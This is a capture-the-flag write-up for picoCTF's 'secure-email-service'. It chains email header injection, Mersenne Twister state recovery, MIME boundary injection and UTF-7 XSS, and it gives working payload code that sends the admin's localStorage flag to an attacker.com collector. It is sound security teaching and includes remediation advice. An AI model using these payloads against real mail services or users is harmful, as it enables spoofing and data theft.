Description

A Flask email service signs messages with S/MIME. Chain four bugs - email header injection, Mersenne Twister RNG cracking, MIME boundary injection, and UTF-7 XSS - to make the admin bot sign and view a malicious HTML email, then steal the flag from localStorage.

Setup

Download secure-email-service.tar

Unpack and run the Docker stack locally: tar -xvf secure-email-service.tar && docker compose up --build. Local debugging is faster than poking the remote instance because you can print() from the Flask app.

Log in as user@ses with the provided credentials and walk the send/reply flow once so you know exactly which form fields you control.

Open app/views.py (or equivalent) and search for Subject, boundary, and the admin-bot URL handler. Note the exact line where the subject string is concatenated into the email and where random.randrange is called.

bash

tar -xvf secure-email-service.tar

bash

docker compose up --build

bash

# Log in: user@ses / <provided password>

bash

grep -rn 'boundary\|randrange\|Subject' app/ src/

Solution

Big-picture before the steps: the admin bot logs itself in automatically whenever you trigger it, and the flag lives in that logged-in admin's browser localStorage. Everything below is in service of getting JavaScript to run inside the admin's post-login session so it can read that key and ship it to your collector.

Step 1
Inject a From header via the subject field
Observation
I noticed the server concatenates the user-supplied subject directly into the raw email header string without sanitization, which suggested that injecting a newline followed by 'From :admin@ses' (using Python's space-before-colon parser quirk) would spoof the sender address seen by the admin bot.
The server inserts the user-supplied subject directly into the email headers. Python 3.11's email module accepts header names containing a space before the colon, so From :admin@ses is parsed as a separate From header rather than part of the subject. Inject a newline followed by From :admin@ses (note the space before the colon) in your subject to spoof the sender address when the admin bot views and replies to your message.
bash
# Subject value to inject:
#   'Hello\nFrom :admin@ses'
# Or base64-encoded in RFC 2047 format to survive header folding:
#   '=?ISO-8859-1?B?<base64 of Hello\nFrom :admin@ses>?='
What didn't work first
Tried: Inject From: without the space before the colon (e.g. subject value 'Hello\nFrom:admin@ses') to spoof the sender.
Python 3.11's email module rejects a raw injected 'From:' header added this way because it treats the colon as part of a folded subject continuation rather than a new header name boundary. The space-before-colon quirk ('From :') is what causes the parser to treat the injected text as a new header instead of folded subject content. Without that space the injection silently fails and the admin sees only the garbled subject, never a forged sender.
Tried: Send the newline injection as a literal \r\n in the HTTP form body without RFC 2047 base64 wrapping.
A raw newline in a form field reaches the application intact, and that is the problem: it is still a literal character when the email library validates and encodes the header, so the library can reject or escape it. Wrapping the payload as an RFC 2047 encoded-word (=?ISO-8859-1?B?...?=) moves the newline into the base64 payload, where a check for literal newlines cannot see it, and defers the decoding to the email parser, where it becomes an actual header separator.
Learn more
Email header injection exploits the fact that HTTP headers and email headers both use newline sequences as delimiters. If a web form inserts user input directly into an email header field (such as the Subject), an attacker can include a newline character (\r\n or just \n) to start a new header. The email library then parses the injected text as a legitimate additional header.
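A minimal sketch of that failure mode, assuming the application builds the raw message by string concatenation. The `build_raw` helper, the `X-Injected` header, and the message layout are hypothetical, not the challenge's code:

```python
import email


def build_raw(subject: str) -> str:
    # Hypothetical vulnerable builder: the subject is pasted into the header block as-is.
    return (
        "To: admin@ses\n"
        f"Subject: {subject}\n"
        "\n"
        "body text\n"
    )


# The attacker's subject carries a newline followed by an extra header line.
msg = email.message_from_string(build_raw("Hello\nX-Injected: yes"))

print(msg["Subject"])     # the subject ends at the injected newline
print(msg["X-Injected"])  # the remainder was parsed as a header of its own
```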
The space-before-colon bypass exploits a quirk in Python's email library: a header name of From : (with a trailing space) passes validation checks that reject From: in certain contexts, yet the email parser treats it as a separate From header when rendering the message. This kind of parser inconsistency is common in format-parsing libraries and is the source of many security vulnerabilities; a checker and a renderer that agree on most inputs but diverge at edge cases create an exploitable gap.
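The checker side of that gap can be illustrated with a single regular expression. This is a sketch under an assumption: the validator is modelled as "newline, a run of non-whitespace characters, then a colon", which is how I understand the embedded-header check in CPython's email.header to be shaped. The pattern below is written out by hand for illustration and is not imported from the library:

```python
import re

# Assumed shape of the validator: newline, non-whitespace run, colon.
looks_like_header = re.compile(r"\n[^ \t]+:")

plain = "Hello\nFrom:admin@ses"    # classic injection
spaced = "Hello\nFrom :admin@ses"  # space before the colon

print(bool(looks_like_header.search(plain)))   # the checker flags this one
print(bool(looks_like_header.search(spaced)))  # the checker lets this one through
```

Whether a downstream parser then accepts `From :` as a header is a separate question, and the exploit depends on the answer differing from the checker's.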
RFC 2047 encoded-word syntax (=?charset?encoding?text?=) allows non-ASCII content and binary data in email headers. Base64-encoding a payload as an encoded word smuggles newlines past simple string validation that looks for literal \n characters. The email client decodes the encoded word before displaying it to the user, revealing the hidden newline and the injected header.
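The smuggling effect is easy to reproduce with the standard library. A small sketch, using the subject value from Step 1. Only `base64` and `email.header.decode_header` are used, and the literal-newline filter is a stand-in for whatever validation the target applies:

```python
import base64
from email.header import decode_header

payload = b"Hello\nFrom :admin@ses"
encoded_word = "=?ISO-8859-1?B?" + base64.b64encode(payload).decode("ascii") + "?="

# A filter that only looks for literal newlines sees nothing suspicious.
print("\n" in encoded_word)

# Decoding the encoded-word restores the original bytes, newline included.
decoded_bytes, charset = decode_header(encoded_word)[0]
print(decoded_bytes)
```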
Step 2
Predict the next MIME boundary via MT19937
Observation
I noticed the app generates MIME boundaries using Python's non-cryptographic 'random.randrange(sys.maxsize)', which is a seeded MT19937 PRNG whose full internal state can be reconstructed from enough observed outputs; this suggested collecting ~800 boundary integers and using a z3-based symbolic solver to predict the next boundary needed for the MIME injection.
The application generates multipart MIME boundaries using Python's random.randrange(sys.maxsize). On a 64-bit system sys.maxsize is 2^63 - 1, so randrange internally calls getrandbits(63), which consumes two 32-bit MT19937 words and discards the lowest bit of one of them. The result is a 63-bit value where you observe 32 bits cleanly from one word and only 31 bits from the other (the lost bit is unknown). Standard tools like randcrack require full 32-bit outputs and cannot handle the missing bit. Instead, send approximately 800 emails, split each 63-bit boundary into its two MT word contributions (a 31-bit half and a 32-bit half), mark the unknown bit with a placeholder, and feed all observations to a z3-based symbolic solver that can recover the MT state despite the missing information. Once the state is recovered, predict the next boundary value and verify it matches before crafting the exploit.
bash
pip install z3-solver requests tqdm
python
# Solver: git clone https://github.com/icemonster/symbolic_mersenne_cracker.git
# (imported below as z3_crack)
import tqdm
import z3_crack

ut = z3_crack.Untwister()
for _ in tqdm.tqdm(range(800)):
    boundary_int = get_boundary(session)   # your own helper: read the boundary integer from the MIME header
    b = bin(boundary_int)[2:].zfill(63)    # 63-bit binary string, most significant bit first
    half1, half2 = b[:31], b[31:]          # high 31 bits | low 32 bits
    ut.submit(half2)                       # first MT word: all 32 bits observed
    ut.submit(half1 + '?')                 # second MT word: lowest bit unknown
r2 = ut.get_random()                       # z3 solves for the MT state
predicted = r2.getrandbits(63)             # next boundary value
What didn't work first
Tried: Use the randcrack library instead of symbolic_mersenne_cracker to recover the MT19937 state from collected boundary values.
randcrack requires exactly 32-bit outputs from random.getrandbits(32). Each MIME boundary comes from random.getrandbits(63), which internally consumes two 32-bit MT words but discards the lowest bit of one of them before returning. randcrack has no mechanism to handle that missing bit: it untempers each submitted value directly and needs full, untruncated 32-bit words. Feeding it the split halves with a guessed low bit hands it wrong words about half the time, so the recovered state is garbage and the predicted boundaries are wrong.
Tried: Collect only 624 boundaries (the classical MT state size) before attempting to crack the RNG state.
Each 63-bit boundary contributes one full 32-bit word and one 31-bit word with an unknown bit. The unknown bit means each boundary provides slightly less than two full words of constraint. The z3 solver needs the constraint system to be over-determined before it can unambiguously resolve all 624 internal state words and the free unknown-bit variables. With only 624 observations the system is under-constrained and z3 either times out or returns multiple candidate states, making boundary prediction unreliable. Around 800 observations is the empirical threshold where the system becomes fully determined.
Learn more
The Mersenne Twister (MT19937) is Python's default PRNG (used by the random module). It has a period of 2^19937 - 1 and passes most statistical tests, but it is not cryptographically secure: its internal state of 624 32-bit words is completely determined by 624 consecutive 32-bit outputs. Once the state is known, all future and past outputs are predictable. This makes it unsuitable for any security-sensitive application; use secrets.token_bytes() or os.urandom() instead.
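The state-recovery claim can be checked locally. A minimal sketch, assuming full 32-bit outputs (the easy case, not the 63-bit boundaries of this challenge). The helper names `undo_right`, `undo_left`, and `untemper` are illustrative:

```python
import random


def undo_right(y: int, shift: int) -> int:
    # Invert y = x ^ (x >> shift), recovering bits from the top down.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x


def undo_left(y: int, shift: int, mask: int) -> int:
    # Invert y = x ^ ((x << shift) & mask), recovering bits from the bottom up.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ ((x << shift) & mask)
    return x & 0xFFFFFFFF


def untemper(y: int) -> int:
    # Reverse the four MT19937 tempering steps in the opposite order.
    y = undo_right(y, 18)
    y = undo_left(y, 15, 0xEFC60000)
    y = undo_left(y, 7, 0x9D2C5680)
    return undo_right(y, 11)


victim = random.Random(2025)
outputs = [victim.getrandbits(32) for _ in range(624)]

# Rebuild the state words and load them into a fresh generator.
clone = random.Random()
clone.setstate((3, tuple(untemper(o) for o in outputs) + (624,), None))

predictions = [clone.getrandbits(32) for _ in range(5)]
actual = [victim.getrandbits(32) for _ in range(5)]
print(predictions == actual)
```

This direct inversion is what stops working once a bit of each second word is missing, which is why the walkthrough switches to a symbolic solver.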
The reason standard randcrack fails here is subtle. CPython's getrandbits(63) draws two 32-bit MT words: the first fills the low 32 bits of the result unchanged, and the second is shifted right by one and fills the high 31 bits. The shift discards the lowest bit of the second word, so one bit of MT output is lost per boundary observation. Randcrack requires exact 32-bit values and has no mechanism for unknown bits, so it cannot reconstruct state from these partial observations. The symbolic_mersenne_cracker library uses z3 to model each MT word as a symbolic bitvector and each observation as a set of constraints. The unknown bit becomes a free variable that z3 resolves while solving the full 624-word system. After 800 observations the constraint set is over-determined and z3 recovers the exact internal state.
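The way a 63-bit value maps onto two MT words can be confirmed by replaying the same generator state. A short sketch, with an arbitrary seed and illustrative variable names:

```python
import random

rng = random.Random(2025)
state = rng.getstate()

value = rng.getrandbits(63)

# Replay the same two 32-bit words from a copy of the generator.
replay = random.Random()
replay.setstate(state)
first_word = replay.getrandbits(32)
second_word = replay.getrandbits(32)

low32 = value & 0xFFFFFFFF   # comes from the first word, untouched
high31 = value >> 32         # comes from the second word, lowest bit dropped

print(low32 == first_word)
print(high31 == second_word >> 1)
```

This is why the extraction code submits the low 32 bits first and then the high 31 bits followed by one unknown bit.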
Predicting the MIME boundary is necessary because the exploit injects a forged MIME boundary into the email subject. For the injection to be interpreted correctly by the admin's email parser, the injected boundary string must exactly match what the server generates for the signed reply. Without the correct boundary, the injected MIME part is not recognized and the XSS payload does not execute. See Python for CTF for the scripting patterns used here.
Step 3
UTF-7 XSS via the predicted MIME boundary
Observation
I noticed the server's HTML sanitizer operates on the raw bytes before rendering, so a payload using UTF-7 encoding arrives as ASCII-safe '+ADw-img...' strings with no visible angle brackets, which suggested declaring 'charset=utf-7' in the injected MIME part to slip the XSS payload past sanitization and have the admin's email client decode the angle brackets only at render time.
Craft an email subject that uses the RFC 2047 encoded-word format to inject newlines and include a forged second MIME part. The injected part declares Content-Type: text/html; charset=utf-7 and contains a UTF-7-encoded XSS payload. Because HTML escaping operates on the UTF-8 representation, it does not neutralize the UTF-7 encoding of < and >. When the admin bot's email client renders the reply and decodes the UTF-7 charset, the HTML is parsed and the script executes.
python
import base64

# 1. Build the UTF-7 text. Python's built-in 'utf-7' codec leaves < and > as literals
#    (RFC 2152 lets encoders emit them directly), so escape them by hand, and write
#    the JavaScript + as +- so a UTF-7 decoder does not read it as a shift character.
payload = "<img src=x onerror=fetch('https://attacker.com/?c='+localStorage.getItem('flag'))>"
utf7 = (payload.replace('+', '+-')
               .replace('<', '+ADw-')
               .replace('>', '+AD4-')
               .encode('ascii'))

# 2. Build the injected MIME part. `boundary` is the full boundary token (bytes), exactly
#    as it will appear in the Content-Type header, rebuilt from the predicted integer.
injected = (b'\r\n--' + boundary + b'\r\nContent-Type: text/html; charset=utf-7\r\n\r\n'
            + utf7 + b'\r\n--' + boundary + b'--')

# 3. Wrap a newline plus the injected part in an RFC 2047 encoded-word
#    so the smuggle survives header validation.
smuggle = b'\n' + injected
subject_header = b'=?ISO-8859-1?B?' + base64.b64encode(smuggle) + b'?='
# Send subject_header as the Subject field; the email parser decodes it,
# sees the literal newline, and treats everything after as appended body parts.
Expected output (value of utf7)
```
b"+ADw-img src=x onerror=fetch('https://attacker.com/?c='+-localStorage.getItem('flag'))+AD4-"
```
What didn't work first
Tried: Inject the XSS payload as a UTF-8 encoded text/html MIME part rather than declaring charset=utf-7.
A UTF-8 HTML part with literal angle brackets will be processed by the server's HTML sanitizer before signing, which strips or escapes script-capable tags like img with onerror. Declaring charset=utf-7 causes the payload to arrive at the sanitizer as the ASCII-safe sequence '+ADw-img...' with no angle brackets present, so the sanitizer sees no HTML to strip. The angle brackets only materialize when the admin's email client decodes the UTF-7 charset during rendering, at which point sanitization has already passed.
Tried: Use the approximate predicted boundary value but off by one (predicted + 1 or predicted - 1) when constructing the injected MIME part.
The multipart MIME parser requires the injected '--boundary' delimiter to exactly match the Content-Type boundary parameter character for character. Even a one-digit difference causes the parser to treat the injected section as raw text appended to the existing MIME part rather than as a new MIME boundary. The HTML part is never recognized, no charset is decoded, and the XSS payload never executes. The boundary prediction must be exact, which is why the z3 solver step verifies the first predicted value against an observed email before building the final exploit.
Learn more
UTF-7 is a Unicode encoding that represents non-ASCII characters using only 7-bit ASCII. It encodes characters using + as an escape prefix: the sequence +ADw- decodes to < and +AD4- decodes to >. Each escape is the unpadded base64 of the character's UTF-16BE code unit, wrapped in + and -, and a literal + is written as +-. Python's built-in utf-7 codec will not generate these escapes for you, because RFC 2152 allows encoders to emit < and > directly and CPython's encoder does, so write +ADw- and +AD4- into the payload explicitly. Standard HTML sanitisers operate on the decoded Unicode string, but if the sanitiser receives the raw bytes and the browser decodes them afterwards, the angle brackets survive unsanitised.
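A sketch of how such escapes can be produced and why an escaping pass does not touch them. Assumptions: the `utf7_escape` helper and its `DIRECT` allow-list are hypothetical, the payload is a harmless stand-in, and `html.escape` stands in for whatever escaping the server applies:

```python
import base64
import html

# Characters passed through unchanged; everything else becomes a +...- escape.
DIRECT = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ().:/,-?")


def utf7_escape(text: str) -> str:
    out = []
    for ch in text:
        if ch in DIRECT:
            out.append(ch)
        else:
            # Unpadded base64 of the UTF-16BE code unit(s), wrapped in + and -.
            units = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
            out.append("+" + units + "-")
    return "".join(out)


payload = "<img src=x onerror=alert('x'+1)>"
escaped = utf7_escape(payload)

print(escaped)
print(html.escape(escaped) == escaped)                     # nothing left for the escaper to rewrite
print(escaped.encode("ascii").decode("utf-7") == payload)  # a UTF-7 decoder restores the markup
```

Escaping more characters than strictly necessary (quotes, =, +) keeps the payload free of anything an HTML-aware filter would react to.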
The attack chain at this step is: inject a new MIME part into the signed email (using the predicted boundary), declare its charset as UTF-7, and put an <img onerror=...> payload in UTF-7 encoding inside that part. The email server signs the entire multipart message including the injected part. When the admin bot views its own signed reply, the email client renders the HTML part, decodes UTF-7 to Unicode, parses the angle brackets as HTML, and executes the JavaScript in the onerror handler. See XSS for CTF for the broader payload toolbox.
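The role of the exact boundary can be seen with Python's own parser. A minimal sketch with made-up boundary strings and a hypothetical `part_types` helper. The real message layout in the challenge may differ:

```python
import email


def part_types(real_boundary: str, injected_boundary: str) -> list[str]:
    # The first part's text carries an injected delimiter line and part headers.
    raw = (
        f'Content-Type: multipart/mixed; boundary="{real_boundary}"\n'
        "\n"
        f"--{real_boundary}\n"
        "Content-Type: text/plain\n"
        "\n"
        "legitimate text\n"
        f"--{injected_boundary}\n"
        "Content-Type: text/html; charset=utf-7\n"
        "\n"
        "+ADw-b+AD4-injected\n"
        f"--{real_boundary}--\n"
    )
    msg = email.message_from_string(raw)
    return [part.get_content_type() for part in msg.get_payload()]


exact = part_types("0000000000000000042", "0000000000000000042")
off_by_one = part_types("0000000000000000042", "0000000000000000043")

print(exact)       # the injected delimiter opens a second, HTML part
print(off_by_one)  # the injected lines stay inside the plain-text part
```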
The XSS payload calls localStorage.getItem('flag') because the challenge application stores the flag in the admin's browser localStorage after a successful sign-in, and the admin bot runs in a headless browser context that persists localStorage between email views. The payload exfiltrates the flag value to an attacker-controlled server via a fetch() call or an image src attribute.
Step 4
Trigger the XSS and collect the flag
Observation
I noticed the challenge description states the flag lives in the admin bot's browser localStorage after login, which suggested the XSS payload should call 'localStorage.getItem("flag")' and exfiltrate the value to an attacker-controlled server via a fetch request.
Send the crafted email to the admin bot's address. The bot receives it, views the body (triggering the XSS), and the payload exfiltrates localStorage to your server. The flag value is picoCTF{always_a_step_ahead_...}.
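On the receiving end, any HTTP listener that logs the query string is enough. A minimal collector sketch, assuming the payload sends the value in a `c` query parameter as in Step 3. The `extract_param`, `Collector`, and `serve` names and the port are hypothetical:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def extract_param(path: str, name: str = "c"):
    # Pull one query parameter out of the request path, URL-decoded.
    values = parse_qs(urlsplit(path).query).get(name)
    return values[0] if values else None


class Collector(BaseHTTPRequestHandler):
    def do_GET(self):
        print("received:", extract_param(self.path))
        self.send_response(204)
        self.end_headers()


def serve(port: int = 8000) -> None:
    # Call serve() on a host the admin bot can reach; it blocks until interrupted.
    HTTPServer(("0.0.0.0", port), Collector).serve_forever()
```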
Learn more
This challenge is rated as one of the hardest in picoCTF 2025; fewer than 10 of the ~10,000 participating teams solved it during the competition. The exploit chain requires understanding five distinct technical areas simultaneously: email header parsing edge cases, Python's PRNG internals, MIME structure, charset encoding, and XSS attack vectors. Each individual step is a known technique, but chaining them all correctly is genuinely difficult.
The broader lesson is that defense in depth requires every component of a system to be secure. S/MIME provides a valid cryptographic signature; the emails are authenticated. But authentication alone does not prevent the content of an authenticated email from being malicious. The vulnerability is not in the cryptography; it is in the application logic that trusts user-supplied header fields and in the email client that renders HTML with a dangerous charset. Secure systems must validate at every trust boundary, not just at the authentication layer.
Remediation for this challenge would require (1) using email.headerregistry to safely encode subject values rather than string interpolation, (2) replacing random with secrets for boundary generation, (3) sanitizing HTML email content before rendering it in the admin client, and (4) storing the flag in an HttpOnly cookie or server-side session rather than localStorage. The cookies and JWT guide expands on point 4.
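Points 1 and 2 can be sketched with the standard library alone. This is an illustration under assumptions, not the challenge's patched code: it relies on EmailMessage's default policy (which builds headers through email.headerregistry) and uses a random hex token as the boundary:

```python
import secrets
from email.message import EmailMessage
from email.mime.multipart import MIMEMultipart

# (1) With the default EmailMessage policy, a header value containing a line break is refused.
msg = EmailMessage()
try:
    msg["Subject"] = "Hello\nFrom :admin@ses"
    rejected = False
except ValueError:
    rejected = True
print(rejected)

# (2) A boundary drawn from the secrets module cannot be predicted from earlier ones.
boundary = secrets.token_hex(16)
container = MIMEMultipart("mixed", boundary=boundary)
print(container.get_boundary() == boundary)
```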

Flag

picoCTF{always_a_step_ahead_...}

Chain: subject header injection (From: spoofing) → MT19937 RNG crack (~800 boundaries) → inject UTF-7 HTML MIME part using predicted boundary → XSS exfiltrates localStorage flag.

Key takeaway

Defense in depth requires every component of a system to be independently secure; valid S/MIME signatures authenticate the sender but cannot prevent malicious content when the application layer has unsanitized headers, a weak PRNG for MIME boundaries, and a client that renders UTF-7 HTML without sanitization. Chaining four separate vulnerabilities into a single exploit is the pattern that characterizes high-difficulty real-world attacks - each bug looks manageable in isolation, but the composition is critical.

secure-email-service picoCTF 2025 Solution
